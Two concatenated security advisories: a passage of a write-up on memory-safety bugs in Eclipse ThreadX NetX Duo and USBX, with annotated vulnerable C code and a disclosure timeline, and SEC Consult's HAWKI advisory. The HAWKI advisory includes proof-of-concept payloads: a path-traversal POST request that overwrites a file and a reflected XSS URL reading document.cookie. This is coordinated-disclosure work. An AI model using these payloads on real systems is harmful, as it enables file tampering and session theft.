/>https://github.com/eclipse-threadx/threadx/pull/339<br /><br />See also:<br />https://github.com/eclipse-threadx/threadx/security/advisories/GHSA-v9jj-7qjg-h6g6<br /><br /><br />--[ 3.3 - CVE-2024-2452 - Integer wraparound, under-allocation, and heap buffer overflow in Eclipse ThreadX NetX Duo<br /><br />In Eclipse ThreadX NetX Duo before version 6.4.0, if an attacker could control<br />the parameters of `__portable_aligned_alloc()` they could cause an integer<br />wraparound and an allocation smaller than expected. 
This could cause subsequent<br />heap buffer overflows.<br /><br />The vulnerability was spotted in the following file:<br />* /addons/azure_iot/azure_iot_security_module/iot-security-module-core/deps/flatcc/include/flatcc/portable/paligned_alloc.h<br /><br />If an attacker could control the `size` or `alignment` arguments to the<br />`__portable_aligned_alloc()` function, they could cause an integer wraparound<br />thus causing `malloc()` to allocate a small amount of memory, exposing to<br />subsequent heap buffer overflows (AKA BadAlloc-style memory corruption):<br />```c<br />static inline void *__portable_aligned_alloc(size_t alignment, size_t size)<br />{<br /> char *raw;<br /> void *buf;<br /> size_t total_size = (size + alignment - 1 + sizeof(void *)); // VULN: integer wraparound<br /><br /> if (alignment < sizeof(void *)) {<br /> alignment = sizeof(void *);<br /> }<br /> raw = (char *)(size_t)malloc(total_size); // VULN: under-allocation BadAlloc style<br /> buf = raw + alignment - 1 + sizeof(void *);<br /> buf = (void *)(((size_t)buf) & ~(alignment - 1));<br /> ((void **)buf)[-1] = raw; // malloc ret is not checked; in case NULL is returned the program would crash here<br /> return buf;<br />}<br />```<br /><br />We spotted the same vulnerability in Azure IoT Preview source code at:<br />https://github.com/azure-rtos/azure-iot-preview/blob/master/azure_iot/azure_iot_security_module/iot-security-module-core/deps/flatcc/include/flatcc/portable/paligned_alloc.h<br /><br />The maintainers confirmed the vulnerability, but informed us that the Azure IoT<br />Preview repository was not part of a product. 
Therefore, it was removed<br />entirely.<br /><br />Fixes:<br />https://github.com/eclipse-threadx/netxduo/pull/227<br /><br />See also:<br />https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-h963-7vhw-8rpx<br /><br /><br />--[ 3.4 - Other bugs with potential security implications in Eclipse ThreadX NetX Duo and USBX<br /><br />In addition to the vulnerabilities covered in the previous sections, we also<br />reported a few other bugs with potential security implications that were not<br />considered as vulnerabilities by Eclipse ThreadX maintainers. As such, our<br />reports were declassed to standard issues for code improvement.<br /><br />The first one is an unsafe use of the return value of `snprintf()` that we<br />observed in Eclipse ThreadX NetX Duo, in the following file:<br />* /addons/azure_iot/nx_azure_iot_adu_agent.c<br /><br />The `snprintf()` API function returns the total length of the string it tried<br />to create, which could be larger than the actual length written; if an attacker<br />were able to craft input so that `update_id_length` became larger than<br />`NX_AZURE_IOT_ADU_AGENT_UPDATE_MANIFEST_SIZE` and if the return value were used<br />unsafely (e.g., as an array index) somewhere else in the code, memory<br />corruption could have occured:<br />```c<br />static UINT nx_azure_iot_adu_agent_reported_properties_state_send(NX_AZURE_IOT_ADU_AGENT *adu_agent_ptr)<br />{<br /><br />NX_PACKET *packet_ptr;<br />NX_AZURE_IOT_JSON_WRITER json_writer;<br />NX_AZURE_IOT_ADU_AGENT_UPDATE_MANIFEST_CONTENT *manifest_content = &(adu_agent_ptr -> nx_azure_iot_adu_agent_update_manifest_content);<br />UINT status;<br />UINT result_code;<br />UINT i;<br />/* Prepare the buffer for step name: such as: "step_0", the max name is "step_xxx". */<br />CHAR step_property_name[8] = "step_";<br />UINT step_size = sizeof("step_") - 1;<br />UINT step_property_name_size;<br />UINT update_id_length;<br />...<br /> /* Fill installed update id. 
*/<br /> if ((adu_agent_ptr -> nx_azure_iot_adu_agent_state == NX_AZURE_IOT_ADU_AGENT_STATE_IDLE) && <br /> (adu_agent_ptr -> nx_azure_iot_adu_agent_update_manifest_content.steps_count))<br /> {<br /><br /> /* Use nx_azure_iot_adu_agent_update_manifest as temporary buffer to encode the update id as string.*/<br /> update_id_length = (UINT)snprintf((CHAR *)adu_agent_ptr -> nx_azure_iot_adu_agent_update_manifest,<br /> NX_AZURE_IOT_ADU_AGENT_UPDATE_MANIFEST_SIZE,<br /> "{\"%.*s\":\"%.*s\",\"%.*s\":\"%.*s\",\"%.*s\":\"%.*s\"}",<br /> sizeof(NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_PROVIDER) - 1,<br /> NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_PROVIDER,<br /> manifest_content -> update_id.provider_length, manifest_content -> update_id.provider, <br /> sizeof(NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_NAME) - 1,<br /> NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_NAME,<br /> manifest_content -> update_id.name_length, manifest_content -> update_id.name,<br /> sizeof(NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_VERSION) - 1,<br /> NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_VERSION,<br /> manifest_content -> update_id.version_length, manifest_content -> update_id.version); // VULN: unsafe use of snprintf() return value<br /><br /> if (nx_azure_iot_json_writer_append_property_with_string_value(&json_writer,<br /> (const UCHAR *)NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_INSTALLED_CONTENT_ID,<br /> sizeof(NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_INSTALLED_CONTENT_ID) - 1,<br /> adu_agent_ptr -> nx_azure_iot_adu_agent_update_manifest,<br /> update_id_length)) // VULN: potentially large length is used to populate the "installedUpdateId" JSON property<br /> {<br /> nx_packet_release(packet_ptr);<br /> return (NX_NOT_SUCCESSFUL);<br /> }<br /> }<br />...<br />```<br /><br />We also spotted some potentially ineffective size checks due to assertions in<br />Eclipse ThreadX USBX, in the following files:<br />* /common/core/src/ux_hcd_sim_host_transaction_schedule.c<br />* 
/common/usbx_device_classes/src/ux_device_class_audio20_control_process.c<br /><br />If assertions were compiled-out in production code and `td -><br />ux_sim_host_td_length` was attacker-controlled, the `_ux_utility_memory_copy()`<br />function would have been able to write past the `slave_transfer_request -><br />ux_slave_transfer_request_setup` fixed-size (8 bytes) buffer:<br />```c<br />UINT _ux_hcd_sim_host_transaction_schedule(UX_HCD_SIM_HOST *hcd_sim_host, UX_HCD_SIM_HOST_ED *ed)<br />{<br /><br />UX_DCD_SIM_SLAVE *dcd_sim_slave;<br />UX_HCD_SIM_HOST_TD *td;<br />UX_HCD_SIM_HOST_TD *head_td;<br />UX_HCD_SIM_HOST_TD *tail_td;<br />UX_HCD_SIM_HOST_TD *data_td;<br />UX_ENDPOINT *endpoint;<br />UX_SLAVE_ENDPOINT *slave_endpoint;<br />UX_DCD_SIM_SLAVE_ED *slave_ed;<br />ULONG slave_transfer_remaining;<br />UCHAR wake_host;<br />UCHAR wake_slave;<br />ULONG transaction_length;<br />ULONG td_length;<br />UX_SLAVE_TRANSFER *slave_transfer_request;<br />UX_TRANSFER *transfer_request;<br />ULONG endpoint_index;<br />UX_SLAVE_DCD *dcd;<br /><br /> UX_PARAMETER_NOT_USED(hcd_sim_host);<br /><br /> /* Get the pointer to the DCD portion of the simulator. */<br /> dcd = &_ux_system_slave -> ux_system_slave_dcd;<br /><br /> /* Check the state of the controller if OPERATIONAL . */<br /> if (dcd -> ux_slave_dcd_status != UX_DCD_STATUS_OPERATIONAL)<br /> return(UX_ERROR);<br /><br /> /* Get the pointer to the candidate TD on the host. */<br /> td = ed -> ux_sim_host_ed_head_td;<br /><br /> /* Get the pointer to the endpoint. */<br /> endpoint = ed -> ux_sim_host_ed_endpoint;<br /><br /> /* Get the pointer to the transfer_request attached with this TD. */<br /> transfer_request = td -> ux_sim_host_td_transfer_request;<br /><br /> /* Get the index of the endpoint from the host. */<br /> endpoint_index = endpoint -> ux_endpoint_descriptor.bEndpointAddress & ~(ULONG)UX_ENDPOINT_DIRECTION;<br /><br /> /* Get the address of the device controller. 
*/<br /> dcd_sim_slave = (UX_DCD_SIM_SLAVE *) dcd -> ux_slave_dcd_controller_hardware;<br /><br /> /* Get the endpoint as seen from the device side. */<br />#ifdef UX_DEVICE_BIDIRECTIONAL_ENDPOINT_SUPPORT<br /> slave_ed = ((endpoint -> ux_endpoint_descriptor.bEndpointAddress == 0) ?<br /> &dcd_sim_slave -> ux_dcd_sim_slave_ed[0] :<br /> ((endpoint -> ux_endpoint_descriptor.bEndpointAddress & UX_ENDPOINT_DIRECTION) ?<br /> &dcd_sim_slave -> ux_dcd_sim_slave_ed_in[endpoint_index] :<br /> &dcd_sim_slave -> ux_dcd_sim_slave_ed[endpoint_index]));<br />#else<br /> slave_ed = &dcd_sim_slave -> ux_dcd_sim_slave_ed[endpoint_index];<br />#endif<br /><br /> /* Is this ED used? */<br /> if ((slave_ed -> ux_sim_slave_ed_status & UX_DCD_SIM_SLAVE_ED_STATUS_USED) == 0)<br /> return(UX_ERROR);<br /><br /> /* Is this ED ready for transaction or stalled ? */<br /> if ((slave_ed -> ux_sim_slave_ed_status & (UX_DCD_SIM_SLAVE_ED_STATUS_TRANSFER | UX_DCD_SIM_SLAVE_ED_STATUS_STALLED)) == 0)<br /> return(UX_ERROR);<br /><br /> /* Get the logical endpoint from the physical endpoint. */<br /> slave_endpoint = slave_ed -> ux_sim_slave_ed_endpoint;<br /><br /> /* Get the pointer to the transfer request. */<br /> slave_transfer_request = &slave_endpoint -> ux_slave_endpoint_transfer_request;<br /><br /> /* Check the phase for this transfer, if this is the SETUP phase, treatment is different. Explanation of how <br /> control transfers are handled in the simulator: if the data phase is OUT, we handle it immediately, meaning we <br /> send all the data to the device and remove the STATUS TD in the same scheduler call. If the data phase is IN, we <br /> only take out the SETUP TD and handle the data phase like any other non-control transactions (i.e. the scheduler <br /> calls us again with the DATA TDs). 
*/<br /> if (td -> ux_sim_host_td_status & UX_HCD_SIM_HOST_TD_SETUP_PHASE)<br /> {<br /><br /> /* For control transfer, stall is for protocol error and it's cleared any time when SETUP is received */<br /> slave_ed -> ux_sim_slave_ed_status &= ~(ULONG)UX_DCD_SIM_SLAVE_ED_STATUS_STALLED;<br /><br /> /* Validate the length to the setup transaction buffer. */<br /> UX_ASSERT(td -> ux_sim_host_td_length == 8); // VULN: if assertions are compiled-out in production code, this check is ineffective<br /><br /> /* Reset actual data length (not including SETUP received) so far. */<br /> slave_transfer_request -> ux_slave_transfer_request_actual_length = 0;<br /><br /> /* Move the buffer from the host TD to the device TD. */<br /> _ux_utility_memory_copy(slave_transfer_request -> ux_slave_transfer_request_setup,<br /> td -> ux_sim_host_td_buffer,<br /> td -> ux_sim_host_td_length); /* Use case of memcpy is verified. */ // VULN: potential buffer overflow due to ineffective size check<br />```<br /><br />If assertions were compiled-out in production code and `data_length` was<br />attacker-controlled, the `_ux_utility_memory_copy()` function would have been<br />able to write past the `transfer -> ux_slave_transfer_request_data_pointer`<br />buffer:<br />```c<br />...<br />UINT _ux_device_class_audio20_control_process(UX_DEVICE_CLASS_AUDIO *audio,<br /> UX_SLAVE_TRANSFER *transfer,<br /> UX_DEVICE_CLASS_AUDIO20_CONTROL_GROUP *group)<br />{<br /><br />UX_SLAVE_ENDPOINT *endpoint;<br />UX_DEVICE_CLASS_AUDIO20_CONTROL *control;<br />UCHAR request;<br />UCHAR request_type;<br />UCHAR unit_id;<br />UCHAR control_selector;<br />UCHAR channel_number;<br />ULONG request_length;<br />ULONG data_length;<br />ULONG i;<br />ULONG n_sub, pos, min, max, res, freq;<br /><br /> /* Get instances. 
*/<br /> endpoint = &audio -> ux_device_class_audio_device -> ux_slave_device_control_endpoint;<br /> transfer = &endpoint -> ux_slave_endpoint_transfer_request;<br /><br /> /* Extract all necessary fields of the request. */<br /> request = *(transfer -> ux_slave_transfer_request_setup + UX_DEVICE_CLASS_AUDIO_REQUEST_REQUEST);<br /> request_type = *(transfer -> ux_slave_transfer_request_setup + UX_DEVICE_CLASS_AUDIO_REQUEST_REQUEST_TYPE);<br /> unit_id = *(transfer -> ux_slave_transfer_request_setup + UX_DEVICE_CLASS_AUDIO_REQUEST_ENEITY_ID);<br /> control_selector = *(transfer -> ux_slave_transfer_request_setup + UX_DEVICE_CLASS_AUDIO_REQUEST_CONTROL_SELECTOR);<br /> channel_number = *(transfer -> ux_slave_transfer_request_setup + UX_DEVICE_CLASS_AUDIO_REQUEST_CHANNEL_NUMBER);<br /> request_length = _ux_utility_short_get(transfer -> ux_slave_transfer_request_setup + UX_SETUP_LENGTH);<br /><br /> for (i = 0; i < group -> ux_device_class_audio20_control_group_controls_nb; i ++)<br /> {<br /> control = &group -> ux_device_class_audio20_control_group_controls[i];<br /><br /> /* Reset change map. */<br /> control -> ux_device_class_audio20_control_changed = 0;<br /><br /> /* Is this request a clock unit request? */<br /> if (unit_id == control -> ux_device_class_audio20_control_cs_id)<br /> {<br /><br /> /* Clock Source request.<br /> * We only support Sampling Frequency Control here.<br /> * The Sampling Frequency Control must support the CUR and RANGE(MIN, MAX, RES) attributes.<br /> */<br />...<br /> /* We just support sampling frequency control, GET request. */<br /> if ((request_type & UX_REQUEST_DIRECTION) == UX_REQUEST_IN &&<br /> (control_selector == UX_DEVICE_CLASS_AUDIO20_CS_SAM_FREQ_CONTROL))<br /> {<br /><br /> switch(request)<br /> {<br /> case UX_DEVICE_CLASS_AUDIO20_CUR:<br /><br /> /* Check request parameter. */<br /> if (request_length < 4)<br /> break;<br /><br /> /* Send sampling frequency. 
*/<br /> if (control -> ux_device_class_audio20_control_sampling_frequency)<br /> _ux_utility_long_put(transfer -> ux_slave_transfer_request_data_pointer, control -> ux_device_class_audio20_control_sampling_frequency);<br /> else<br /> _ux_utility_long_put(transfer -> ux_slave_transfer_request_data_pointer, control -> ux_device_class_audio20_control_sampling_frequency_cur);<br /> _ux_device_stack_transfer_request(transfer, 4, request_length);<br /> return(UX_SUCCESS);<br /><br /> case UX_DEVICE_CLASS_AUDIO20_RANGE:<br /><br /> /* Check request parameter. */<br /> if (request_length < 2)<br /> break;<br /><br /> if (control -> ux_device_class_audio20_control_sampling_frequency == 0)<br /> {<br /><br /> /* Send range parameters, RANGE is customized. */<br /> UX_ASSERT(control -> ux_device_class_audio20_control_sampling_frequency_range != UX_NULL);<br /><br /> /* Get wNumSubRanges. */<br /> n_sub = _ux_utility_short_get(control -> ux_device_class_audio20_control_sampling_frequency_range);<br /> UX_ASSERT(n_sub > 0);<br /><br /> /* Calculate length, n_sub is 16-bit width, result not overflows ULONG. */<br /> data_length = 2 + n_sub * 12;<br /> UX_ASSERT(data_length <= UX_SLAVE_REQUEST_CONTROL_MAX_LENGTH); // VULN: if assertions are compiled-out in production code, this check is ineffective<br /><br /> /* Copy data. */<br /> data_length = UX_MIN(data_length, request_length);<br /> _ux_utility_memory_copy(transfer -> ux_slave_transfer_request_data_pointer,<br /> control -> ux_device_class_audio20_control_sampling_frequency_range,<br /> data_length); /* Use case of memcpy is verified. 
*/ // VULN: potential buffer overflow due to ineffective size check<br />...<br />```<br /><br />Please note that there may be other instances/variants of these last bugs.<br />Therefore, a thorough assessment of all assertions used to check buffer sizes<br />in the Eclipse ThreadX codebase is recommended.<br /><br />Finally, in Eclipse ThreadX USBX before pull request #161 was merged, there was<br />a memory copy with unchecked size in the<br />`_ux_host_class_pima_storage_info_get()` function in the following file:<br />* /common/usbx_host_classes/src/ux_host_class_pima_storage_info_get.c<br /><br />There was no size check for the two memory copy operations via the<br />`_ux_utility_memory_copy()` function marked below. Therefore, a write past the<br />end of the fixed-size (256 bytes) buffer `storage -><br />ux_host_class_pima_storage_description` could have occurred:<br />```c<br />UINT _ux_host_class_pima_storage_info_get(UX_HOST_CLASS_PIMA *pima,<br /> UX_HOST_CLASS_PIMA_SESSION *pima_session,<br /> ULONG storage_id, UX_HOST_CLASS_PIMA_STORAGE *storage)<br />{<br /><br />UX_HOST_CLASS_PIMA_COMMAND command;<br />UINT status;<br />UCHAR *storage_buffer;<br />UCHAR *storage_pointer;<br />ULONG unicode_string_length;<br /><br /> /* If trace is enabled, insert this event into the trace buffer. */<br /> UX_TRACE_IN_LINE_INSERT(UX_TRACE_HOST_CLASS_PIMA_STORAGE_INFO_GET, pima, storage_id, storage, 0, UX_TRACE_HOST_CLASS_EVENTS, 0, 0)<br /><br /> /* Check if this session is valid or not. */<br /> if (pima_session -> ux_host_class_pima_session_magic != UX_HOST_CLASS_PIMA_MAGIC_NUMBER)<br /> return (UX_HOST_CLASS_PIMA_RC_SESSION_NOT_OPEN);<br /><br /> /* Check if this session is opened or not. */<br /> if (pima_session -> ux_host_class_pima_session_state != UX_HOST_CLASS_PIMA_SESSION_STATE_OPENED)<br /> return (UX_HOST_CLASS_PIMA_RC_SESSION_NOT_OPEN);<br /><br /> /* Issue command to get the storage IDs. 1 parameter. 
*/<br /> command.ux_host_class_pima_command_nb_parameters = 1;<br /><br /> /* Parameter 1 is the Storage ID. */<br /> command.ux_host_class_pima_command_parameter_1 = storage_id;<br /><br /> /* Other parameters unused. */<br /> command.ux_host_class_pima_command_parameter_2 = 0;<br /> command.ux_host_class_pima_command_parameter_3 = 0;<br /> command.ux_host_class_pima_command_parameter_4 = 0;<br /> command.ux_host_class_pima_command_parameter_5 = 0;<br /><br /> /* Then set the command to GET_STORAGE_INFO. */<br /> command.ux_host_class_pima_command_operation_code = UX_HOST_CLASS_PIMA_OC_GET_STORAGE_INFO;<br /><br /> /* Allocate some DMA safe memory for receiving the storage info block. */<br /> storage_buffer = _ux_utility_memory_allocate(UX_SAFE_ALIGN, UX_CACHE_SAFE_MEMORY, UX_HOST_CLASS_PIMA_STORAGE_MAX_LENGTH);<br /> if (storage == UX_NULL)<br /> return(UX_MEMORY_INSUFFICIENT);<br /><br /> /* Issue the command. */<br /> status = _ux_host_class_pima_command(pima, &command, UX_HOST_CLASS_PIMA_DATA_PHASE_IN , storage_buffer,<br /> UX_HOST_CLASS_PIMA_STORAGE_MAX_LENGTH, UX_HOST_CLASS_PIMA_STORAGE_MAX_LENGTH);<br /><br /> /* Check the result. If the result is OK, the storage info block was read properly. */<br /> if (status == UX_SUCCESS)<br /> {<br /> /* Uncompress the storage descriptor, at least the fixed part. */<br /> _ux_utility_descriptor_parse(storage_buffer,<br /> _ux_system_class_pima_object_structure,<br /> UX_HOST_CLASS_PIMA_OBJECT_ENTRIES,<br /> (UCHAR *) storage);<br /><br /> /* Copy the storage description field. Point to the beginning of the storage description string. */<br /> storage_pointer = storage_buffer + UX_HOST_CLASS_PIMA_STORAGE_VARIABLE_OFFSET;<br /><br /> /* Get the unicode string length. */<br /> unicode_string_length = (ULONG) *storage_pointer ;<br /><br /> /* Copy that string into the storage description field. 
*/<br /> _ux_utility_memory_copy(storage -> ux_host_class_pima_storage_description, storage_pointer, unicode_string_length); /* Use case of memcpy is verified. */ // VULN: unchecked copy size for a copy in a fixed size (256 bytes) buffer (UX_HOST_CLASS_PIMA_STORAGE_MAX_LENGTH used to dynamically allocate storage_buffer is 512 bytes)<br /><br /> /* Point to the volume label. */<br /> storage_pointer = storage_buffer + UX_HOST_CLASS_PIMA_STORAGE_VARIABLE_OFFSET + unicode_string_length;<br /><br /> /* Get the unicode string length. */<br /> unicode_string_length = (ULONG) *storage_pointer ;<br /><br /> /* Copy that string into the storage volume label field. */<br /> _ux_utility_memory_copy(storage -> ux_host_class_pima_storage_volume_label, storage_pointer, unicode_string_length); /* Use case of memcpy is verified. */ // VULN: unchecked copy size for a copy in a fixed size (256 bytes) buffer (UX_HOST_CLASS_PIMA_STORAGE_MAX_LENGTH used to dynamically allocate storage_buffer is 512 bytes)<br /><br /> }<br /><br /> /* Free the original storage info buffer. */<br /> _ux_utility_memory_free(storage_buffer);<br /><br /> /* Return completion status. */<br /> return(status);<br />}<br />```<br /><br /><br />--[ 4 - Affected products<br /><br />Eclipse ThreadX before version 6.4.0 was affected by the vulnerabilities<br />discussed in this advisory. 
The other bugs in Eclipse ThreadX NetX Duo and USBX<br />that we reported will be patched in subsequent releases of Eclipse ThreadX.<br /><br /><br />--[ 5 - Remediation<br /><br />Eclipse ThreadX maintainers have fixed all vulnerabilities discussed in this<br />advisory.<br /><br />Please check the official Eclipse ThreadX channels for further information<br />about fixes.<br /><br /><br />--[ 6 - Disclosure timeline<br /><br />We reported the vulnerabilities discussed in this advisory to Microsoft in<br />December 2023 and early January 2024, via their MSRC Researcher Portal [8].<br />For our efforts, we were awarded 7th place in the Top MSRC 2023 Q4 Azure<br />Security Researchers Leaderboard [9].<br /><br />Following the project ownership transfer to the Eclipse Foundation, with<br />Microsoft's help, we coordinated with the new maintainers to provide<br />vulnerability information and fixes to the ThreadX users' community.<br /><br />The (simplified) coordinated disclosure timeline follows:<br /><br />2023-12-01: Reported two vulnerabilities to MSRC.<br />2023-12-13: MSRC confirmed our first vulnerability.<br />2023-12-14: MSRC confirmed our second vulnerability.<br />2023-12-21: Reported two other vulnerabilities to MSRC.<br />2023-12-31: Reported another vulnerability to MSRC.<br />2024-01-02: Reported three other vulnerabilities to MSRC.<br />2024-01-05: MSRC confirmed a vulnerability was fixed in version 6.4.<br />2024-01-06: MSRC informed us we made the 2023 Q4 leaderboard!<br />2024-01-10: MSRC confirmed another vulnerability was fixed in version 6.4.<br />2024-02-10: Asked MSRC for updates on all open reports.<br />2024-02-16: Asked the Eclipse Foundation for advice on how to proceed.<br />2024-02-20: Eclipse replied they were coordinating with MSRC.<br />2024-02-21: MSRC informed us of the ownership transfer to Eclipse.<br />2024-02-27: MSRC confirmed a third vulnerability was fixed in version 6.4.<br />2024-02-28: Upon MSRC's request, we submitted our 
reports to Eclipse.<br />2024-03-05: Eclipse started creating GitHub advisories for all reports.<br />2024-03-13: Provided Eclipse with clarifications on some of the reports.<br />2024-03-15: MSRC provided some additional feedback on the transition.<br />2024-03-18: Eclipse finished creating GitHub advisories for all reports.<br />2024-03-22: MSRC closed the remaining cases after the transition.<br />2024-03-25: Eclipse published CVE-2024-2212, CVE-2024-2214, CVE-2024-2452.<br />2024-03-29: Provided Eclipse with clarifications on remaining reports.<br />2024-04-24: Asked for a status update on the remaining reports.<br />2024-04-26: Agreed to declass the remaining reports to standard issues.<br />2024-05-02: Sent draft advisory and writeup to MSRC and Eclipse.<br />2024-05-28: Published advisory and writeup.<br /><br /><br />--[ 7 - Acknowledgments<br /><br />We would like to thank MSRC and the Eclipse Foundation (with a special mention<br />to Marta Rybczynska who took care of coordinated disclosure after the project<br />ownership change) for triaging and fixing the reported vulnerabilities. It was<br />a pleasure to work with you!<br /><br /><br />--[ 8 - References<br /><br />[1] https://eclipse-foundation.blog/2023/11/21/introducing-eclipse-threadx/<br />[2] https://github.com/eclipse-threadx/<br />[3] https://security.humanativaspa.it/ost2-zephyr-rtos-and-a-bunch-of-cves/<br />[4] https://security.humanativaspa.it/multiple-vulnerabilities-in-rt-thread-rtos/<br />[5] https://security.humanativaspa.it/multiple-vulnerabilities-in-riot-os/<br />[6] https://security.humanativaspa.it/big-update-to-my-semgrep-c-cpp-ruleset/<br />[7] https://security.humanativaspa.it/a-collection-of-weggli-patterns-for-c-cpp-vulnerability-research/<br />[8] https://msrc.microsoft.com/report/vulnerability<br />[9] https://msrc.microsoft.com/blog/2024/01/congratulations-to-the-top-msrc-2023-q4-security-researchers/<br /><br /><br />Copyright (c) 2024 Marco Ivaldi and Humanativa Group. 
All rights reserved.<br /></code></pre>
<pre><code> SEC Consult Vulnerability Lab Security Advisory < 20240527-0 ><br />=======================================================================<br /> title: Multiple vulnerabilities<br /> product: HAWKI (Interaction Design Team at the University of Applied<br /> Sciences and Arts in Hildesheim/Germany)<br /> vulnerable version: 1.0.0-beta.1, versions before commit 146967f<br /> fixed version: Github commit 146967f<br /> CVE number: CVE-2024-25975, CVE-2024-25976, CVE-2024-25977<br /> impact: high<br /> homepage: https://github.com/HAWK-Digital-Environments/HAWKI<br /> found: 2024-03-05<br /> by: Florian Stuhlmann (Office Bochum)<br /> Thorger Jansen (Office Bochum)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"HAWKI is a didactic interface for universities based on the OpenAI API.<br />It is not necessary for users to create an account, the university ID<br />is sufficient for login - no user-related data is stored."<br /><br />Source: https://github.com/HAWK-Digital-Environments/HAWKI<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br />SEC Consult highly recommends to perform a thorough security review of the<br />product conducted by security professionals to identify and resolve potential<br />further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Arbitrary File Overwrite (CVE-2024-25975)<br />The application implements an up- and downvote function which alters a<br />value within a JSON file. The POST parameters are not filtered properly<br />and therefore an arbitrary file can be overwritten. 
The file can be<br />chosen by an authenticated attacker, but its content cannot be controlled.<br />It is possible to overwrite all files for which the webserver has write access.<br />It is required to supply a relative path (path traversal).<br /><br />2) Reflected Cross-Site-Scripting (CVE-2024-25976)<br />When LDAP authentication is activated in the configuration it is possible<br />to obtain reflected XSS execution by creating a custom URL that the<br />victim only needs to open in order to execute arbitrary JavaScript code in<br />the victim's browser.<br /><br />3) Session Fixation (CVE-2024-25977)<br />The application does not change the session token when using the login or<br />logout functionality. An attacker can set a session token in the victim's<br />browser (e.g. via XSS) and prompt the victim to log in (e.g. via a redirect<br />to the login page). This results in the victim's account being taken over.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Arbitrary File Overwrite (CVE-2024-25975)<br />The following POST request can overwrite the file "AvatarFinanzen.png". This<br />file is a default file located within the "img" folder.<br /><br />---<br />POST /downvote.php HTTP/2<br />Host: $host<br />Cookie: PHPSESSID=<Session Id><br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 25<br /><br />../img/AvatarFinanzen.png<br />---<br /><br />Both upvote.php and downvote.php are vulnerable. The only filtering applied is<br />htmlspecialchars(), which encodes HTML metacharacters but leaves "../" sequences<br />intact, so the raw request body ends up in the file path. The vulnerable part in<br />downvote.php is:<br /><br />---<br />[...]<br /> $id = file_get_contents("php://input");<br /> $sanitizedId = htmlspecialchars($id, ENT_QUOTES, 'UTF-8');<br /> $file = "feedback/" . 
$sanitizedId;<br />[...]<br /> file_put_contents("feedback/$sanitizedId", json_encode($json));<br />[...]<br />---<br /><br /><br />2) Reflected Cross-Site-Scripting (XSS) (CVE-2024-25976)<br />A call to the following URL will trigger an alert box:<br /><br />---<br />https://$host/HAWKI/login.php/"><script>alert(document.cookie)</script><br />---<br /><br />This is due to a fault in the file login.php where the content of<br />"$_SERVER['PHP_SELF']" is reflected into the HTML of the website. Hence<br />the attacker does not need a valid account in order to exploit this issue.<br />The following code is vulnerable:<br /><br />---<br />[...]<br /> $server = $_SERVER['PHP_SELF'];<br />[...]<br /> echo '<form action = "' . $server . '" class="column" method = "post" ><br />[...]<br />---<br /><br />The vulnerability is exploitable with the Apache2 default configuration.<br />For other webservers, the vulnerability might not be exploitable.<br /><br /><br />3) Session Fixation (CVE-2024-25977)<br />The attacker changes the value of PHPSESSID within the victim's browser to<br />something like "abc". 
An attacker with the same value for PHPSESSID is now<br />authenticated as well after the victim successfully logs in.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested, which was the latest version available<br />at the time of the test:<br />* 1.0.0-beta.1<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2024-03-21: Contacting vendor through email referenced on Github<br />2024-03-22: Asking about email encryption, sending report unencrypted<br /> as requested.<br />2024-04-17: Asked the vendor again to receive details regarding the timeline.<br />2024-04-18: Vendor provides a patch pushed to the public repository.<br />2024-05: Fix verification phase.<br />2024-05-27: Release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides a patch which can be downloaded from<br />https://github.com/HAWK-Digital-Environments/HAWKI/commit/146967f3148e92d1640ffebc21d8914e2d7fb3f1<br /><br /><br />Workaround:<br />-----------<br />No workaround available.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. 
The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Florian Stuhlmann & Thorger Jansen / @2024<br /></code></pre>
